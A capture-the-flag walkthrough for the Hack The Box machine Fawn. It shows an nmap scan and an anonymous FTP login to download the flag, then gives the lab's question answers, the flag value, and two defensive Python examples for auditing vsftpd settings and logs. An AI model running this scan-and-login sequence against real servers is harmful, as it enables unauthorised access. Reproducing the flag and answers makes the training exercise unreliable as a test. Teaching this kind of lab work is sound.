Dear friend, welcome to haXez, and thank you for stopping by. Today we’re looking at the Hack The Box Machine Fawn. It’s a super easy box that requires you to enumerate the services on the box and then utilize those services to capture the flag. There are also a number of questions that you need to answer to own the machine.
The first thing we need to do is spawn an instance of the machine. However, a prerequisite of spawning the machine is connecting to the VPN. I’ve covered this before in my Meow walkthrough, so have a look there if you don’t know where to start. Once you have connected and spawned a machine, you will be given an IP address.
Ping The Thing
In order to check that we can communicate with the machine, we can use the tool ping to see if it responds to our ICMP packets. This can be run from the terminal by typing ping followed by the IP address of the box. As you can see from the output below, I sent four ping requests to the machine and it responded successfully.
┌──(kali㉿kali)-[~]
└─$ ping 10.129.247.20
PING 10.129.247.20 (10.129.247.20) 56(84) bytes of data.
64 bytes from 10.129.247.20: icmp_seq=1 ttl=63 time=15.2 ms
64 bytes from 10.129.247.20: icmp_seq=2 ttl=63 time=14.3 ms
64 bytes from 10.129.247.20: icmp_seq=3 ttl=63 time=14.7 ms
64 bytes from 10.129.247.20: icmp_seq=4 ttl=63 time=14.9 ms
--- 10.129.247.20 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3004ms
rtt min/avg/max/mdev = 14.349/14.776/15.169/0.293 ms
A Lap With Nmap
Now that we know we can communicate with the Fawn machine, we need to enumerate what services the machine is running. We can do this using our favorite network mapping tool, Nmap. It is good practice to add some additional flags or arguments to your Nmap scan in order to get as much information from the scan as possible. For this reason, we are going to tell Nmap to report back the service versions (-sV) and the operating system (-O), using a TCP connect scan (-sT) across every port (-p0-). The output below shows that the machine is running vsftpd version 3.0.3 and, from the Service Info line, that the base operating system is Unix.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -O -p0- 10.129.247.20
[sudo] password for kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-08 12:36 EDT
Nmap scan report for 10.129.247.20
Host is up (0.017s latency).
Not shown: 65535 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=5/8%OT=21%CT=1%CU=37672%PV=Y%DS=2%DC=I%G=Y%TM=6277F198
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=103%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M505ST11NW7%O2=M505ST11NW7%O3=M505NNT11NW7%O4=M505ST11NW7%O5=M505ST11
OS:NW7%O6=M505ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(
OS:R=Y%DF=Y%T=40%W=FAF0%O=M505NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=
OS:R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%R
OS:UCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Unix
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.38 seconds
FTP, or File Transfer Protocol, is a service that allows you to transfer files between a client and a server. There are many clients out there, including terminal-based and graphical ones. One FTP misconfiguration that can be taken advantage of is the anonymous login feature. Anonymous login is just that: it allows you to log in anonymously. You don’t need to know the username or password of an existing user. You just have to specify your name as anonymous and submit anything for a password. If anonymous logins are supported, then you will be granted access to the files on the FTP server. As you can see below, anonymous logins are supported by the server and we can log in and view the files using the dir command.
┌──(kali㉿kali)-[~]
└─$ ftp 10.129.60.207
Connected to 10.129.60.207.
220 (vsFTPd 3.0.3)
Name (10.129.60.207:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||43096|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt
226 Directory send OK.
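From the server owner's side, the anonymous login shown above comes down to a handful of vsftpd.conf directives. The following is an added example, not part of the original walkthrough: a small audit that flags those directives, run over two constructed configurations (one permissive, one hardened). The function names and sample files are assumptions made for illustration.

```python
# Added example; directive names are vsftpd.conf options, sample configs are constructed.
SAMPLE_WEAK = """\
listen=YES
anonymous_enable=YES
no_anon_password=YES
local_enable=YES
"""
SAMPLE_HARDENED = """\
listen=YES
anonymous_enable=NO
local_enable=YES
write_enable=NO
"""

TRUTHY = {"YES", "TRUE", "1"}  # values vsftpd treats as enabled
ANON_WRITE_OPTS = ("anon_upload_enable", "anon_mkdir_write_enable",
                   "anon_other_write_enable")

def parse_conf(text):
    """Return {option: value} from 'option=value' lines, skipping '#' comments."""
    opts = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        opts[key.strip()] = value.strip()
    return opts

def enabled(opts, name):
    return opts.get(name, "NO").upper() in TRUTHY

def audit(text):
    """Return a list of findings about anonymous FTP access."""
    opts = parse_conf(text)
    if "anonymous_enable" not in opts:
        return ["anonymous_enable not set: result depends on the build default"]
    if not enabled(opts, "anonymous_enable"):
        return []
    findings = ["anonymous_enable is on: login without an account is allowed"]
    if enabled(opts, "no_anon_password"):
        findings.append("no_anon_password is on: no password prompt at all")
    for opt in ANON_WRITE_OPTS:
        if enabled(opts, opt):
            findings.append(f"{opt} is on: an anonymous write permission is granted")
    return findings

if __name__ == "__main__":
    for name, conf in (("weak", SAMPLE_WEAK), ("hardened", SAMPLE_HARDENED)):
        print(name, audit(conf) or "no anonymous-access findings")
```

Setting anonymous_enable=NO explicitly, as in the hardened sample, removes the dependence on whatever default the installed build ships with.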
Grab The Flag
The Fawn FTP server appears to have a text file on it called flag.txt. Perhaps this is the elusive root flag that we need to capture. In order to download the flag, we can use the get command. The get command allows you to download files from the server, and you can see an example of me using it to download the flag below.
ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||31037|)
150 Opening BINARY mode data connection for flag.txt (32 bytes).
100% |***************************************************************** 32 21.00 KiB/s 00:00 ETA
226 Transfer complete.
32 bytes received in 00:00 (0.60 KiB/s)
Once the flag has been downloaded, you can use the cat command to view the contents of the file.
┌──(kali㉿kali)-[~]
└─$ cat flag.txt
035db21c881520061c53e0536e44f815
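The anonymous login and the get shown above both leave entries in the server's log. The following is an added example, not part of the original walkthrough, that pulls anonymous logins and downloads out of such a log, grouped by client. It assumes vsftpd's own log file format; the sample lines are constructed, use documentation-range addresses, and the regex will need adjusting for other log formats.

```python
import re
from collections import defaultdict

# Constructed lines in the style of vsftpd's own log file (assumed format);
# addresses are documentation ranges, /flag.txt mirrors the file seen on this page.
SAMPLE_LOG = """\
Sun May  8 12:41:02 2022 [pid 812] CONNECT: Client "192.0.2.10"
Sun May  8 12:41:05 2022 [pid 811] [ftp] OK LOGIN: Client "192.0.2.10", anon password "x"
Sun May  8 12:41:19 2022 [pid 813] [ftp] OK DOWNLOAD: Client "192.0.2.10", "/flag.txt", 32 bytes, 0.60Kbyte/sec
Sun May  8 12:50:44 2022 [pid 901] [alice] OK LOGIN: Client "198.51.100.7"
Sun May  8 12:51:10 2022 [pid 903] [alice] OK DOWNLOAD: Client "198.51.100.7", "/home/alice/notes.txt", 120 bytes, 2.10Kbyte/sec
"""

# [pid N] [user] OK|FAIL EVENT: Client "addr"<rest>
LINE = re.compile(
    r'\[pid \d+\] \[(?P<user>[^\]]+)\] (?P<status>OK|FAIL) (?P<event>[A-Z]+): '
    r'Client "(?P<client>[^"]+)"(?P<rest>.*)$'
)

def anonymous_activity(log_text, anon_users=("ftp", "anonymous")):
    """Map client address -> {'logins': n, 'downloads': [paths]} for anonymous sessions."""
    seen = defaultdict(lambda: {"logins": 0, "downloads": []})
    for line in log_text.splitlines():
        m = LINE.search(line)
        if not m or m["status"] != "OK":
            continue  # CONNECT lines carry no user field; failures are skipped here
        if m["user"] not in anon_users and "anon password" not in m["rest"]:
            continue  # authenticated local user, not an anonymous session
        if m["event"] == "LOGIN":
            seen[m["client"]]["logins"] += 1
        elif m["event"] == "DOWNLOAD":
            path = re.search(r'"([^"]*)"', m["rest"])
            if path:
                seen[m["client"]]["downloads"].append(path.group(1))
    return dict(seen)

if __name__ == "__main__":
    for client, activity in anonymous_activity(SAMPLE_LOG).items():
        print(client, activity)
```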
Fawn Questions And Answers
Before we can submit the root flag, there are a number of questions that we need to answer. I will run through these questions now.
Firstly, What does the 3-letter acronym FTP stand for? File Transfer Protocol
What communication model does FTP use, architecturally speaking? Client-Server Model
What is the name of one popular GUI FTP program? Filezilla
Which port is the FTP service active on usually? 21 TCP
What acronym is used for the secure version of FTP? SFTP
What is the command we can use to test our connection to the target? Ping
From your scans, what version is FTP running on the target? vsftpd 3.0.3
From your scans, what OS type is running on the target? Unix
Submit root flag